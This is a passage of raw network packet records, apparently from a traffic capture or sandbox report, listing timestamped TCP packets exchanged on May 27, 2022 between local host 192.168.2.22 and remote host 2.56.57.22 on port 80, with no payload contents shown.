May 27, 2022 12:02:27.402503967 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402522087 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402529955 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402546883 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402556896 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402570009 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402585030 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402592897 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402601957 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402616024 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402616978 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402640104 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402657986 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402663946 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402686119 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402687073 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402700901 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402712107 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402734995 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402741909 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402755976 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402759075 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402770042 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402782917 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402796984 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402806044 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402816057 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402829885 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402832031 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402853012 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402864933 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402875900 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402896881 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402899027 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402909040 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402923107 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402940035 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402945042 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402968884 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402992010 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402992964 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402997971 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403009892 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403016090 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403024912 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403038979 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403044939 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403063059 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403074980 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403086901 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403094053 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403110981 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403120995 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403134108 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403145075 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403156996 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403163910 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403179884 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403187037 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403203011 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403218031 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403227091 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403234005 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403249979 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403259039 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403274059 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403285980 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403297901 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403311968 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403320074 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403330088 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403342962 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403351068 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403366089 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403371096 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403389931 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403399944 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403413057 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403418064 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403436899 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403445005 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403460979 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403469086 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403484106 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403487921 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403506994 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403516054 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403531075 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403532982 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403578997 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403600931 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403605938 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403620958 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403625965 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403639078 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403652906 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403661013 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403676033 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403677940 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403702021 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403716087 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403724909 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403748989 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403749943 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403769970 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403773069 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403780937 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403798103 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403800011 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403821945 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403830051 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403847933 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403855085 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403872967 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403886080 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403896093 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403902054 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403920889 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403928995 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403947115 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403970003 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.403971910 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403990984 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.403995037 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404019117 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404021978 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404040098 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404043913 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404050112 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404068947 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404079914 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404092073 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404104948 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404117107 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404124022 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404140949 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404150963 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404165030 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404174089 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404187918 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404206991 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404211044 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404218912 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404234886 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404247046 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404258966 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404278994 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404282093 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404289961 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404305935 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404309988 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404330015 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404337883 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404354095 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404361963 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404377937 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404386044 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404401064 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404412031 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404424906 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404437065 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404448032 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404454947 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404484034 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404503107 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404520988 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404521942 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404545069 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404556036 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404570103 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404580116 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404593945 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404603958 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404617071 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404629946 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404649973 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404658079 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404678106 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404700994 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404700994 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404722929 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404725075 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404748917 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404750109 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404761076 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404773951 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404786110 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404798985 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404809952 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404823065 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404839039 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404846907 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404869080 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404870987 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404891968 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404895067 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404903889 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404937029 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404947996 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404962063 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.404983997 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.404984951 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405005932 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405009031 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405018091 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405031919 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405044079 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405062914 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405071020 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405086994 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405108929 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405109882 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405122042 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405133963 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405157089 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405158997 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405169964 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405196905 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405222893 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405225992 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405245066 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405250072 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405267000 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405272007 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405282974 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405296087 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405302048 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405319929 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405342102 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405349016 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405364037 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405366898 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405375957 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405389071 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405396938 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405411959 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405420065 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405435085 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405436993 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405458927 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405468941 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405497074 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405637980 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405688047 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405689955 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405710936 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405725002 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405735016 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405745029 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405757904 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405762911 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405782938 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405791998 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405806065 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405816078 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405829906 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405843019 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405853987 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405875921 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405875921 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405884981 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405900955 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405911922 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405925035 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405930042 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405949116 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405972004 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405977964 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.405994892 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.405996084 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406017065 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406018972 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406029940 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406044006 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406049013 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406068087 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406076908 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406092882 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406102896 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406116962 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406126976 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406141043 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406146049 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406164885 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406173944 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406188011 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406203032 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406213045 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406235933 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406235933 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406246901 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406259060 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406281948 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406281948 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406300068 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406303883 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406320095 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406326056 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406342983 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406348944 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406358957 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406369925 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406380892 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406394005 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406408072 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406418085 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406425953 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406440973 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406446934 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406466007 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406474113 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406490088 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406501055 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406512976 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406517029 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406536102 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406549931 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406558037 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406579971 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406584024 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406599998 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406604052 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406614065 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406625986 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406630993 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406650066 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406656981 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406673908 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406682014 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406697989 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406698942 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406721115 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406728983 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406744957 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406754017 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406768084 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406771898 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406793118 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406799078 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406815052 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406817913 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406838894 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406847000 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406861067 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406862974 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406884909 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406893015 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406908989 CEST	80	49171	2.56.57.22	192.168.2.22
